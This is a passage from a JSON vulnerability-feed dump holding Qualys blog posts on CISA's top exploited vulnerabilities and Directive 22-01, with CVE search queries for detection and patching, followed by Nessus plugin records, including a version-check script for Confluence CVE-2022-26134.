CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like &quot;Cloud Environments&quot;, &quot;Type: Servers&quot;, &quot;Web Servers&quot;, and &quot;VMDR-Web Servers&quot; to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the &quot;Show only Patchable&quot; toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-08-09T15:58:17", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-23T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/161808", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161808);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/23\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0227\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CVE-2022-26134)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'confluence';\n\nvar port = get_http_port(default:8090);\n\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-09T12:31:17", "description": "The Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote this plugin currently only works against 7.14.x and below. This plugin is intended for testing LTS versions of Confluence.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2022_26134.NBIN", "href": "https://www.tenable.com/plugins/nessus/162175", "sourceData": "Binary data confluence_cve_2022_26134.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T00:14:51", "description": "Atlassian Confluence Server and Data Center versions 1.3.x < 7.4.17, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4 and 7.18.x < 7.18.1 suffer from an OGNL injection vulnerability by crafting a specific URL, allowing an unauthenticated attacker to perform a remote code execution on the target application.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-06-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113248", "href": "https://www.tenable.com/plugins/was/113248", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:36:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:17", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:18", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has 